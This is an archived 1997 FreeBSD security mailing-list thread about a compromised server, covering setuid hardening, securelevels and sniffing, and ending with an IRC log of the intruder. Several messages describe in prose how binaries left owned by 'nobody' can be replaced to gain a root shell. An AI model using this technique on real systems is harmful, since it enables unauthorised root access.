Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id PAA06534; Mon, 28 Jul 1997 15:44:28 -0700 (PDT)
Date: Mon, 28 Jul 1997 15:44:27 -0700 (PDT)
From: Vincent Poy To: Karl Denninger cc: Robert Watson , Adam Shostack , security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <19970728164228.19622@Jupiter.Mcs.Net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Karl Denninger wrote: [snip] =)> Does login require suid, or does gettytab run it as root anyway? =)> =)> Robert N Watson =) =)If you take the SUID off login it works fine, PROVIDED you don't try to use =)it to "re-login" (a rather common thing for Berzerkelyoids to do). What did you mean by "re-login"? Is that rlogin you're talking about? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 15:48:19 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA09295 for security-outgoing; Mon, 28 Jul 1997 15:48:19 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA09290 for ; Mon, 28 Jul 1997 15:48:16 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id SAA27376; Mon, 28 Jul 1997 18:47:20 GMT Date: Mon, 28 Jul 1997 18:47:20 +0000 (GMT) 
From: "Jonathan A. Zdziarski"
To: Nate Williams
cc: Robert Watson , Vincent Poy , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <199707282100.PAA07719@rocky.mt.sri.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

httpd and sessiond initially are run as root, before they spawn off into
separate processes. If you replace httpd and sessiond with your own code
that runs before it changes its uid and forks, you will get a root shell.

-------------------------------------------------------------------------
Jonathan A. Zdziarski                  NetRail Incorporated
Server Engineering Manager             230 Peachtree St. Suite 500
jonz@netrail.net                       Atlanta, GA 30303
http://www.netrail.net                 (888) - NETRAIL
-------------------------------------------------------------------------

On Mon, 28 Jul 1997, Nate Williams wrote:

:> There IS one common hole I've seen apache and stronghold have, and that is
:> that some people like to leave their sessiond or httpd files owned by
:> 'nobody'. This allows somebody running CGI on that system to replace
:> those binaries with their own, hacked binaries (since the scripts are
:> usually owned as nobody), and the next time httpd starts, they can make it
:> write a root shell, or just about anything along those lines.
:
:If it's running as 'nobody', it can't create a root shell. It can
:create a 'nobody' shell though...
:
:
:
:Nate
:

From owner-freebsd-security Mon Jul 28 15:49:55 1997
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA09466 for security-outgoing; Mon, 28 Jul 1997 15:49:55 -0700 (PDT)
Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA09451 for ; Mon, 28 Jul 1997 15:49:51 -0700 (PDT)
Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id SAA27656; Mon, 28 Jul 1997 18:49:02 GMT
Date: Mon, 28 Jul 1997 18:49:02 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: Robert Watson
cc: Adam Shostack , Vincent Poy , security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

I was exploring a little while ago programming a chrooted telnetd to
chroot to /usr if the person was over a specific uid. I got it running
nicely, but never got to put it into production to fully test it...had to
do a lot of copying (passwd files, etc, just like ftp).

-------------------------------------------------------------------------
Jonathan A. Zdziarski                  NetRail Incorporated
Server Engineering Manager             230 Peachtree St. Suite 500
jonz@netrail.net                       Atlanta, GA 30303
http://www.netrail.net                 (888) - NETRAIL
-------------------------------------------------------------------------

On Mon, 28 Jul 1997, Robert Watson wrote:

:On Mon, 28 Jul 1997, Adam Shostack wrote:
:
:> Vincent Poy wrote:
:>
:> 	su really should be setuid. Everything else is debatable. My
:> advice is to turn off all setuid bits except those you know you need
:> (possibly w, who, ps, ping, at, passwd)
:>
:> find / -xdev -perm -4000 -ok chmod u-s {} \;
:> find /usr -xdev -perm -4000 -ok chmod u-s {} \;
:> find / -xdev -perm -2000 -ok chmod g-s {} \;
:> find /usr -xdev -perm -2000 -ok chmod g-s {} \;
:> # The semicolons are part of the line
:
:Several mail delivery programs (mail.local, sendmail, uucp-stuff, etc)
:require root access to deliver to local mailboxes; crontab related stuff,
:terminal locking, some kerberos commands, local XWindows servers, and su
:all rely on suid.
:
:What type of secured environment are you hoping to create? If root access
:is only to be used from the console, and shared functions like
:xwindows/mailstuff/user crontab aren't needed, you can probably just
:disable all the suid-root programs, or suid-anything programs. Look also
:at the sgid programs that scan kmem. Ideally, you'd also put the system
:in a higher secure level, and mount all partitions non-suid, as long as
:login kept working :).
:
:Does login require suid, or does gettytab run it as root anyway?
:
: Robert N Watson
:
:Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/
:Network Security Research, Trusted Information Systems http://www.tis.com/
:Network Administrator, SafePort Network Services http://www.safeport.com/
:robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/
:

From owner-freebsd-security Mon Jul 28 15:51:16 1997
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id PAA09572 for security-outgoing; Mon, 28 Jul 1997 15:51:16 -0700 (PDT)
Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id PAA09567 for ; Mon, 28 Jul 1997 15:51:14 -0700 (PDT)
Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id SAA27707; Mon, 28 Jul 1997 18:50:07 GMT
Date: Mon, 28 Jul 1997 18:50:07 +0000 (GMT)
From: "Jonathan A. Zdziarski"
To: Vincent Poy
cc: "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

As long as httpd and sessiond are owned by something other than what cgi
scripts run as you're safe, but if they are both nobody, you can replace
the binary...We had it happen to us once with v1.2; this is how I know.

-------------------------------------------------------------------------
Jonathan A. Zdziarski                  NetRail Incorporated
Server Engineering Manager             230 Peachtree St. Suite 500
jonz@netrail.net                       Atlanta, GA 30303
http://www.netrail.net                 (888) - NETRAIL
-------------------------------------------------------------------------

On Mon, 28 Jul 1997, Vincent Poy wrote:

:On Mon, 28 Jul 1997, [Mario1-] wrote:
:
:=)On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:
:=)
:=): There IS one common hole I've seen apache and stronghold have, and that is
:=): that some people like to leave their sessiond or httpd files owned by
:=): 'nobody'. This allows somebody running CGI on that system to replace
:=): those binaries with their own, hacked binaries (since the scripts are
:=): usually owned as nobody), and the next time httpd starts, they can make it
:=): write a root shell, or just about anything along those lines.
:=)
:=)Now THIS is interesting. I was thinking about this a little while ago.
:=)Didn't it seem like 'nobody' had an awful lot of processes running
:=)last night?
:
:	Yes, it did but they were all httpd and I understand apache httpd
:has fixed this security hole a long time ago since we are using the new
:version of apache.
:
:
:Cheers,
:Vince - vince@MCESTATE.COM - vince@GAIANET.NET
:

From owner-freebsd-security Mon Jul 28 16:07:18 1997
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA10427 for security-outgoing; Mon, 28 Jul 1997 16:07:18 -0700 (PDT)
Received: from main.gbdata.com (USR1-1.detnet.com [207.113.12.25]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA10419 for ; Mon, 28 Jul 1997 16:07:14 -0700 (PDT)
Received: (from gclarkii@localhost) by main.gbdata.com (8.8.5/8.8.5) id SAA02009; Mon, 28 Jul 1997 18:06:59 -0500 (CDT)
From: Gary Clark II
Message-Id: <199707282306.SAA02009@main.gbdata.com>
Subject: Re: security hole in FreeBSD
To: vince@mail.MCESTATE.COM (Vincent Poy)
Date: Mon, 28 Jul 1997 18:06:59 -0500 (CDT)
Cc: winter@jurai.net, security@FreeBSD.ORG, johnnyu@accessus.net, mario1@primenet.com
In-Reply-To: from Vincent Poy at "Jul 28, 97 03:28:38 pm"
X-Mailer: ELM [version 2.4ME+ PL22 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Vincent Poy wrote:
> On Mon, 28 Jul 1997, Matthew N. Dodd wrote:
>
> =)On Mon, 28 Jul 1997, Vincent Poy wrote:
> =)> 	I'll do that as soon as the machine comes back up. I heard that
> =)> suid programs can be a problem too but which ones are required to be suid?
> =)
> =)As a general rule I set all suid/sgid system executables schg and run
> =)with securelevel set to 1 or 2.
> =)
> =)Getting rid of any unnecessary suid/sgid programs would be good too.
>
> 	That wouldn't do any good if the user can chflags noschg on the
> binaries you have schg on.

Which is why you run the system at a VERY low security level. You would
have to reboot into single user mode to do it then.
> > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Gary -- Gary Clark II (N5VMF) | I speak only for myself and "maybe" my company gclarkii@GBData.COM | Member of the FreeBSD Doc Team Providing Internet and ISP startups - http://WWW.GBData.com for information FreeBSD FAQ at ftp://ftp.FreeBSD.ORG/pub/FreeBSD/docs/FAQ.latin1 From owner-freebsd-security Mon Jul 28 16:07:35 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA10457 for security-outgoing; Mon, 28 Jul 1997 16:07:35 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA10449 for ; Mon, 28 Jul 1997 16:07:30 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id TAA26904; Mon, 28 Jul 1997 19:06:47 -0400 (EDT) Date: Mon, 28 Jul 1997 19:06:47 -0400 (EDT) 
From: Brian Buchanan
To: "Nicole H."
cc: security@FreeBSD.ORG
Subject: Detecting sniffers (was: Re: security hole in FreeBSD)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Nicole H. wrote:

> Does anyone know of a good way to detect people "sniffing" on the network? IE a program that will detect a
> machine running in promiscuous mode?
>

I was wondering the same thing when I read a clause prohibiting the use of
network cards in promiscuous mode in the CMU network use policy. I asked
some computer security people I knew about this and their response was
that it is not possible to detect if a network card is in promiscuous mode
unless you have access to the machine it's in - i.e., that you can look at
ifconfig on that machine.

From owner-freebsd-security Mon Jul 28 16:15:29 1997
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA10952 for security-outgoing; Mon, 28 Jul 1997 16:15:29 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA10942 for ; Mon, 28 Jul 1997 16:15:21 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06831; Mon, 28 Jul 1997 16:15:14 -0700 (PDT)
Date: Mon, 28 Jul 1997 16:15:13 -0700 (PDT)
From: Vincent Poy To: "Jordan K. Hubbard" cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <4908.870127835@time.cdrom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jordan K. Hubbard wrote: =)I think you are describing the symptom, not the problem. =) =)This looks very much like a system which was broken into and then =)trojan'd to allow easier, more invisible access. How do you know, =)for example, that your telnetd is really telnetd? Did you verify that? ;) Well, because I connect to the system using telnet ;) Also, this guy has been known to break in to machines (theca@wil-de7-10.ix.netcom.com). This is the person who also hacked irc.hardlink.com. I think this person goes around hacking machine after machine, and nobody does anything about it. =)Also, I'd check that inetd.conf file again and make _really sure_ you =)haven't left remote shell access enabled - a lot of people miss that =)because it's not explicitly labelled "rlogin" like they might expect. I checked and disabled everything except telnetd in /etc/inetd.conf and rebooted the machine and then he kicked all of us who are admins out and shutdown the system. 
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:19:04 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11229 for security-outgoing; Mon, 28 Jul 1997 16:19:04 -0700 (PDT) Received: from sasami.jurai.net (winter@sasami.jurai.net [207.96.1.17]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11224 for ; Mon, 28 Jul 1997 16:18:58 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.5/8.8.5) with SMTP id TAA28134; Mon, 28 Jul 1997 19:18:55 -0400 (EDT) Date: Mon, 28 Jul 1997 19:18:54 -0400 (EDT) 
From: "Matthew N. Dodd" To: Vincent Poy cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > True but if you needed to compile -current, you would need to > remove the schg flags on some binaries before the make world. I was under the impression that doing a 'make world' in multiuser mode wasn't optimal. /* Matthew N. Dodd | A memory retaining a love you had for life winter@jurai.net | As cruel as it seems nothing ever seems to http://www.jurai.net/~winter | go right - FLA M 3.1:53 */ From owner-freebsd-security Mon Jul 28 16:18:49 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11211 for security-outgoing; Mon, 28 Jul 1997 16:18:49 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11197 for ; Mon, 28 Jul 1997 16:18:39 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06857; Mon, 28 Jul 1997 16:18:31 -0700 (PDT) Date: Mon, 28 Jul 1997 16:18:31 -0700 (PDT) 
From: Vincent Poy
To: Ollivier Robert
cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]"
Subject: Re: security hole in FreeBSD
In-Reply-To: <19970728230758.23621@keltia.freenix.fr>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Mon, 28 Jul 1997, Ollivier Robert wrote:

=)According to Vincent Poy:
=)> 	Nope, when I added perl5 yesterday from the ports tree, I deleted
=)> the perl5.003 and sperl5.003 that was there after it got updated to
=)> perl5.00401 and sperl5.00401. Is the /usr/bin/perl vulnerable in any way?
=)
=)Not if it is CURRENT from later than May. No hole that we know of anyway.

	The CURRENT is from June 10th, 1997.

=)> 	True but netstat wasn't working anymore after we kicked him off
=)> the first time and rejected all packets from his ip # when he came back
=)> on.
=)
=)LSOF is your friend in case you haven't compiled it yet.

	Only if I can get on the machine; it won't even boot in single user
mode now. /bin/csh and /bin/sh have been deleted.

Cheers,
Vince - vince@MCESTATE.COM - vince@GAIANET.NET

From owner-freebsd-security Mon Jul 28 16:17:25 1997
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11112 for security-outgoing; Mon, 28 Jul 1997 16:17:25 -0700 (PDT)
Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11097 for ; Mon, 28 Jul 1997 16:17:10 -0700 (PDT)
Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06842; Mon, 28 Jul 1997 16:17:05 -0700 (PDT)
Date: Mon, 28 Jul 1997 16:17:04 -0700 (PDT)
From: Vincent Poy To: "Matthew N. Dodd" cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Matthew N. Dodd wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =)> On Mon, 28 Jul 1997, Matthew N. Dodd wrote: =)> =)As a general rule I set all suid/sgid system executeables schg and run =)> =)with securelevel set to 1 or 2. =) ^^^^^^^^^^^^^^^^^^^^^^^^^ =)> That wouldn't do any good if the user can chflags noschg on the =)> binaries you have schg on. =) =)'man init' True but if you needed to compile -current, you would need to remove the schg flags on some binaries before the make world. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:20:09 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11389 for security-outgoing; Mon, 28 Jul 1997 16:20:09 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11321 for ; Mon, 28 Jul 1997 16:20:01 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06876; Mon, 28 Jul 1997 16:19:34 -0700 (PDT) Date: Mon, 28 Jul 1997 16:19:34 -0700 (PDT) 
From: Vincent Poy To: "Jonathan A. Zdziarski" cc: Nate Williams , Robert Watson , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)httpd and sessiond initially are run as root, before they spawn off into =)separate processes. If you replace httpd and sessiond with your own code, =)so that before it changes its uid and forks, you will get a root shell That's true too since even if you kill the first httpd, the other processes don't die. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:26:34 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA11974 for security-outgoing; Mon, 28 Jul 1997 16:26:34 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA11965 for ; Mon, 28 Jul 1997 16:26:31 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06932; Mon, 28 Jul 1997 16:25:31 -0700 (PDT) Date: Mon, 28 Jul 1997 16:25:30 -0700 (PDT) 
From: Vincent Poy To: "Jonathan A. Zdziarski" cc: "[Mario1-]" , JbHunt , Robert Watson , Tomasz Dudziak , security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)As long as httpd and sessiond are owned by something other than what cgi =)scripts run as you're safe, but if they are both nobody, you can replace =)the binary...We had it happen to us once with v1.2 this is how I know. Hmmm, what should the owners be for those files? Since the apache cgi scripts are owned by root as far as I can remember. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:30:38 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA12301 for security-outgoing; Mon, 28 Jul 1997 16:30:38 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA12296 for ; Mon, 28 Jul 1997 16:30:35 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id QAA06966; Mon, 28 Jul 1997 16:30:30 -0700 (PDT) Date: Mon, 28 Jul 1997 16:30:30 -0700 (PDT) 
From: Vincent Poy To: "Matthew N. Dodd" cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Matthew N. Dodd wrote: =)On Mon, 28 Jul 1997, Vincent Poy wrote: =)> True but if you needed to compile -current, you would need to =)> remove the schg flags on some binaries before the make world. =) =)I was under the impression that doing a 'make world' in multiuser mode =)wasn't optimal. I know but when all the admins are remote, it has to be done multiuser. Is there a way to push the secure level up to 2 and then push it down when a make world is needed? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 16:36:36 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA12790 for security-outgoing; Mon, 28 Jul 1997 16:36:36 -0700 (PDT) Received: from mail001.mediacity.com (mail001.mediacity.com [205.216.172.7]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id QAA12782 for ; Mon, 28 Jul 1997 16:36:34 -0700 (PDT) Received: (qmail 14918 invoked from network); 28 Jul 1997 23:36:06 -0000 Received: from geekgirl.mediacity.com (HELO geekgirl) (208.138.36.24) by mail001.mediacity.com with SMTP; 28 Jul 1997 23:36:06 -0000 Date: Mon, 28 Jul 1997 04:40:47 -0800 
From: "Nicole H."
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)
To: "Nicole H." , Brian Buchanan
Cc: security@FreeBSD.ORG
X-Mailer: Z-Mail Pro 6.1 (Win32 - 021297), NetManage Inc.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=ISO-8859-1
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> On Mon, 28 Jul 1997, Nicole H. wrote:
>
> > Does anyone know of a good way to detect people "sniffing" on the network? IE a program that will detect a
> > machine running in promiscuous mode?
> >
>
> I was wondering the same thing when I read a clause prohibiting the use of
> network cards in promiscuous mode in the CMU network use policy. I asked
> some computer security people I knew about this and their response was
> that it is not possible to detect if a network card is in promiscuous mode
> unless you have access to the machine it's in - i.e., that you can look at
> ifconfig on that machine.

What is the range of sniffing? I.E. can the "sniffer" sniff past switched networks?
What is the "range" of sniffing?

Thanks

Nicole

nicole@mediacity.com          http://www.mediacity.com
Nicole Harrington             Phone: 415-237-1464
Systems Administrator         Pager: 415-301-2482

What do you mean Spelling Errors? My Modem is Error Correcting!

CAUTION: I'm no doctor, I only tell computers what to do. Nothing in this
document should be construed as medical advice. My opinions are subject to
the availability of information. I learn new things each day, and so may
change my opinions. Courtesy is owed. Respect is earned. Love is given.
-- ----------------------------------------------------------------------- From owner-freebsd-security Mon Jul 28 16:49:12 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id QAA13424 for security-outgoing; Mon, 28 Jul 1997 16:49:12 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id QAA13413 for ; Mon, 28 Jul 1997 16:49:07 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id TAA26995; Mon, 28 Jul 1997 19:49:04 -0400 (EDT) Date: Mon, 28 Jul 1997 19:49:03 -0400 (EDT) 
From: Brian Buchanan
To: "Nicole H."
cc: security@FreeBSD.ORG
Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD)

> What is the range of sniffing? I.E. can the "sniffer" sniff past switched networks?
> What is the "range" of sniffing?

A machine can sniff any packet that passes through the wire going into its ethernet card. Switches, bridges, routers, and smarthubs will all limit the range of sniffing by preventing traffic not destined for a part of the network from going down its wires.

For example, if LAN A is connected to LAN B over a switch or a bridge, and both LAN A and LAN B use either 10baseT/100baseT going into a common hub for each LAN or thinnet, then anyone with root access to a machine on LAN A can sniff all packets originating from and destined for LAN A machines, and only those packets. The same applies to LAN B - machines on that network can only sniff the packets from/to other machines on LAN B. However, if one LAN is using 10baseT/100baseT with a smarthub, then machines on that network will only receive their own incoming packets, and will thus not be able to sniff anyone else's packets.

This doesn't mean the packets can't be sniffed, though. If the packets cross any insecure network or pass through a router en route to their destination, they can be sniffed there.
From owner-freebsd-security Mon Jul 28 16:59:55 1997
To: Vincent Poy
cc: security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 16:15:13 PDT."
Date: Mon, 28 Jul 1997 16:59:45 -0700
Message-ID: <5496.870134385@time.cdrom.com>
From: "Jordan K. Hubbard"

> Well, because I connect to the system using telnet ;) Also, this

That proves absolutely nothing. You think I can't hack a telnetd to provide multiple "services?" Wake up, Vinnie! :-)

Jordan

From owner-freebsd-security Mon Jul 28 17:00:56 1997
To: Vincent Poy
cc: security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-reply-to: Your message of "Mon, 28 Jul 1997 16:15:13 PDT."
Date: Mon, 28 Jul 1997 17:00:48 -0700
Message-ID: <5518.870134448@time.cdrom.com>
From: "Jordan K. Hubbard"

> I checked and disabled everything except telnetd in
> /etc/inetd.conf and rebooted the machine and then he kicked all of us who
> are admins out and shutdown the system.

And that's actually pretty funny... One is reminded of the cartoons starring a small cat and the big mouse. :-)

Jordan

From owner-freebsd-security Mon Jul 28 17:03:34 1997
Date: Mon, 28 Jul 1997 17:03:19 -0700 (PDT)
From: Vincent Poy
To: "Jordan K. Hubbard"
cc: security@FreeBSD.ORG, "[Mario1-]", JbHunt
Subject: Re: security hole in FreeBSD
In-Reply-To: <5496.870134385@time.cdrom.com>

On Mon, 28 Jul 1997, Jordan K. Hubbard wrote:

>> Well, because I connect to the system using telnet ;) Also, this
>
> That proves absolutely nothing. You think I can't hack a telnetd to
> provide multiple "services?" Wake up, Vinnie! :-)

Of course you could, but you're not in the same type of hacking business this guy is in. This is a log of an irc chat session.

From johnnyu@accessus.net Mon Jul 28 17:01:43 1997
Date: Mon, 28 Jul 1997 18:38:32 -0500 (CDT)
From: NoHackMe!
To: security@netcom.com
Cc: vince@mcestate.com, mario1@primenet.com
Subject: Logs (Gaianet.net)

Here is a log I just got from talking with theca the hacker!

Session Start: Mon Jul 28 18:16:14 1997
[18:16] yeah
[18:16] hi
[18:16] wasup
that was nice of you last night
[18:16] what? pasting the root pass all over efnet? yea
[18:16] so was icmp pinging me
you shouldn't have hacked the machine
[18:17] i was nice till that started
aside from that the minor ping that you got was nothing
you have created a HUGE DOS situation for the entire company
[18:17] i'll show you all the pings i got
[18:17] 1 sec.
I don't care?
[18:17] ok
You were pinged why?
[18:18] why am i causing a dos?
[18:18] bring your machines back up
